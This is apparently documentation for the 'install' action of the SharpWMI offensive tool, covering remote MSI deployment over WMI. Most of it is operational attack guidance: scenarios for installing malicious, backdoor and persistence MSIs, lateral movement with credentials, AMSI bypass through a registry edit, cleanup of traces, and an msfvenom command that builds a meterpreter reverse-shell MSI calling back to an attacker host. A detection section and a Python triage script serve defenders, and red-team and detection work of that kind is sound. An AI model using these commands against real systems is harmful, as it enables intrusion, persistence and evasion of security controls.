
Overview

The install action installs MSI (Microsoft Installer) packages on remote systems using the Win32_Product.Install WMI method. This enables remote software deployment without requiring interactive access.
This feature was contributed by Justin Bui (@slyd0g) and provides a legitimate-looking method for deploying malicious MSI packages.

Syntax

SharpWMI.exe action=install [computername=HOST[,HOST2,...]] path="MSI_FILE_PATH" [amsi=disable] [username=DOMAIN\user] [password=Password]

Parameters

Parameter     Required  Description
action        Yes       Must be install
path          Yes       Path to MSI file (must be accessible from target)
computername  No        Target host(s), comma-separated. Defaults to localhost
amsi          No        Set to disable to bypass AMSI during installation
username      No        Username for authentication
password      No        Password for authentication
The MSI file must be accessible from the target system. Use UNC paths, local paths, or upload the file first.

Usage Examples

Basic MSI Installation

SharpWMI.exe action=install computername=target.domain.com path="\\fileserver\packages\software.msi"

Example Output

[*] Host                           : target.domain.com
[*] Path                           : C:\temp\installer.msi
[*] Product install returned       : 0
Return values:
  • 0 = Success
  • Non-zero = Error code (see troubleshooting)

Operational Scenarios

Scenario 1: Upload and Install Malicious MSI

# 1. Upload MSI package
SharpWMI.exe action=upload computername=target.domain.com source="malicious.msi" dest="C:\temp\installer.msi" amsi=disable

# 2. Install the MSI
SharpWMI.exe action=install computername=target.domain.com path="C:\temp\installer.msi" amsi=disable

# 3. Clean up MSI file
SharpWMI.exe action=exec computername=target.domain.com command="cmd /c del C:\temp\installer.msi" result=true

Scenario 2: Network Share Deployment

# Install from network share
SharpWMI.exe action=install computername=target.domain.com path="\\attacker-share\packages\payload.msi" amsi=disable username="DOMAIN\admin" password="Password123!"

Scenario 3: Lateral Movement via MSI

# Deploy to multiple systems
SharpWMI.exe action=install computername=ws01,ws02,ws03,ws04,ws05 path="\\fileserver\tools\backdoor.msi" amsi=disable username="DOMAIN\admin" password="Password123!"

Scenario 4: Persistence Installation

# Upload persistence MSI
SharpWMI.exe action=upload computername=target.domain.com source="persist.msi" dest="C:\Windows\Installer\update.msi" amsi=disable

# Install for persistence
SharpWMI.exe action=install computername=target.domain.com path="C:\Windows\Installer\update.msi" amsi=disable

Creating Malicious MSI Files

Using msfvenom:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f msi -o payload.msi
Using WiX Toolset: Create custom MSI with embedded payloads using WiX Toolset for more sophisticated installations.
Custom Actions: MSI files support custom actions that execute during installation, providing opportunities for code execution.

MSI File Access

The MSI file must be accessible from the target system, as a UNC path, a local path, or an HTTP URL.

UNC Path:
# Requires network share access
path="\\fileserver\share\package.msi"
Advantages:
  • No file upload needed
  • Centralized deployment
  • Legitimate-looking paths
Requirements:
  • SMB access to share
  • Target can resolve UNC path
  • Appropriate permissions

AMSI Evasion

When amsi=disable is specified:
  1. Modifies registry: HKCU\Software\Microsoft\Windows Script\Settings\AmsiEnable = 0
  2. Executes MSI installation
  3. Restores original AMSI setting
SharpWMI.exe action=install computername=target.domain.com path="C:\temp\payload.msi" amsi=disable

Remote vs Local Usage

Local Installation (omit computername to target the local system):
SharpWMI.exe action=install path="C:\temp\installer.msi"
Use for:
  • Local testing
  • Post-exploitation on compromised system

Detection Considerations

Event log sources:
  • Event ID 1033: MsiInstaller installation beginning
  • Event ID 1034: MsiInstaller installation completion
  • Event ID 4688: Process creation (msiexec.exe)
  • Sysmon Event ID 1: msiexec.exe spawned by wmiprvse.exe
WMI telemetry:
  • Win32_Product.Install method invocation
  • Event ID 5857: WMI activity
  • Sysmon Event ID 19-21: WMI operations
  • Remote WMI installation operations
File and path indicators:
  • MSI file creation in suspicious locations
  • Installation from temp directories
  • UNC paths from unknown sources
  • MSI files in user-writable locations
Anomalous installations:
  • Unsigned MSI installations
  • MSI from non-standard locations
  • Installations by non-administrative processes
  • Installations outside change windows
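As an added illustration of the indicators above (this is not part of SharpWMI or its documentation), a small Python triage routine run over constructed event records; it also covers the AmsiEnable registry write from the AMSI Evasion section. The event field names are a hypothetical normalised schema, and the KNOWN_SHARE_HOSTS allow-list is an assumption standing in for a site's sanctioned deployment shares.

```python
import re
# Constructed sample events in a hypothetical normalised schema (not a real log format).
SAMPLE_EVENTS = [
    {"source": "Sysmon", "id": 1, "image": r"C:\Windows\System32\msiexec.exe",
     "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "cmdline": r'msiexec /i "C:\temp\installer.msi" AllUsers=1'},
    {"source": "Sysmon", "id": 13, "details": "DWORD (0x00000000)",
     "target": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows Script\Settings\AmsiEnable"},
    {"source": "MsiInstaller", "id": 1033, "package": r"\\10.0.0.5\packages\payload.msi"},
    {"source": "Sysmon", "id": 1, "image": r"C:\Windows\System32\msiexec.exe",
     "parent": r"C:\Windows\CCM\CcmExec.exe",
     "cmdline": r'msiexec /i "\\fileserver\tools\app.msi" /qn'},
]
KNOWN_SHARE_HOSTS = {"fileserver"}  # constructed allow-list of sanctioned deployment shares
SUSPICIOUS_DIR = re.compile(r"\\(temp|tmp|users\\[^\\]+\\(downloads|appdata))\\", re.I)
UNC_HOST = re.compile(r"\\\\([^\\]+)\\")
MSI_PATH = re.compile(r'"([^"]+\.msi)"|(\S+\.msi)', re.I)

def msi_path(ev):
    """Return the .msi path an event refers to (package field or msiexec command line), or None."""
    if "package" in ev:
        return ev["package"]
    m = MSI_PATH.search(ev.get("cmdline", ""))
    return (m.group(1) or m.group(2)) if m else None

def triage_event(ev):
    """Return the indicators from the list above that a single event matches."""
    reasons = []
    sysmon = ev["source"] == "Sysmon"
    # msiexec.exe whose parent is the WMI provider host: the Win32_Product.Install footprint
    if sysmon and ev["id"] == 1 and ev["image"].lower().endswith("msiexec.exe") \
            and ev["parent"].lower().endswith("wmiprvse.exe"):
        reasons.append("msiexec spawned by WmiPrvSE (remote WMI install)")
    # Sysmon 13 (registry value set) on the AmsiEnable value that amsi=disable writes
    if sysmon and ev["id"] == 13 and "0x00000000" in ev["details"] \
            and ev["target"].lower().endswith(r"windows script\settings\amsienable"):
        reasons.append("AmsiEnable set to 0")
    path = msi_path(ev)
    if path:
        if SUSPICIOUS_DIR.search(path):
            reasons.append("MSI in temp or user-writable location")
        host = UNC_HOST.match(path)
        if host and host.group(1).lower() not in KNOWN_SHARE_HOSTS:
            reasons.append("MSI from unknown UNC host " + host.group(1))
    return reasons

def triage(events):
    """Map event index -> matched indicators, keeping only the flagged events."""
    return {i: r for i, ev in enumerate(events) if (r := triage_event(ev))}
```

The fourth sample event (msiexec launched by a management agent from an allow-listed share) is not flagged, which is the baseline the other indicators are measured against.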

Best Practices

MSI Preparation

  • Code sign MSI if possible
  • Use legitimate-looking metadata
  • Test installation locally first
  • Keep MSI size reasonable

Operational Security

  • Always use amsi=disable
  • Clean up MSI files after install
  • Use UNC paths when possible
  • Monitor for installation failures

Path Selection

  • Use legitimate-looking paths
  • Avoid temp directories if possible
  • Consider Windows\Installer directory
  • Match existing package paths

Post-Installation

  • Verify installation succeeded
  • Remove MSI file
  • Check installed programs list
  • Verify payload execution

Installation Options

The install action uses default MSI installation options:
AllUsers = true
Options = ""
PackageLocation = <path>
For custom installation options, use exec action with msiexec:
SharpWMI.exe action=exec computername=target command="msiexec /i C:\temp\installer.msi /quiet /norestart" result=true

Troubleshooting

Cause: Installation failed
Common error codes:
  • 1602: User cancelled installation
  • 1603: Fatal error during installation
  • 1619: Package could not be opened
  • 1625: Installation forbidden by policy
Solution:
  • Check MSI file is accessible
  • Verify file is valid MSI
  • Check for Group Policy restrictions
  • Review installation logs
Cause: Insufficient privileges
Solution:
  • Verify admin credentials
  • Use username and password parameters
  • Check UAC remote restrictions
  • Ensure user can install software
Cause: Path inaccessible from target
Solution:
  • Verify UNC path is accessible
  • Check SMB connectivity
  • Upload file locally first
  • Test path from target system
Cause: UI prompts or long installation
Solution:
  • Use silent installation options
  • Increase timeout if possible
  • Check for interactive prompts
  • Use msiexec with /quiet flag

Verification

Verify MSI installation succeeded:
# List installed products
SharpWMI.exe action=query computername=target.domain.com query="SELECT Name,Version FROM Win32_Product WHERE Name LIKE '%ProductName%'"

# Check processes
SharpWMI.exe action=ps computername=target.domain.com

# Verify files exist
SharpWMI.exe action=exec computername=target.domain.com command="cmd /c dir \"C:\Program Files\Application\"" result=true

Alternative Installation

# Silent installation
SharpWMI.exe action=exec computername=target command="msiexec /i C:\temp\installer.msi /quiet /norestart /l*v C:\temp\install.log" result=true

# Unattended with no UI
SharpWMI.exe action=exec computername=target command="msiexec /i \\share\app.msi /qn /norestart" result=true

# With properties
SharpWMI.exe action=exec computername=target command="msiexec /i C:\temp\app.msi /quiet INSTALLDIR=\"C:\CustomPath\" PROPERTY=VALUE" result=true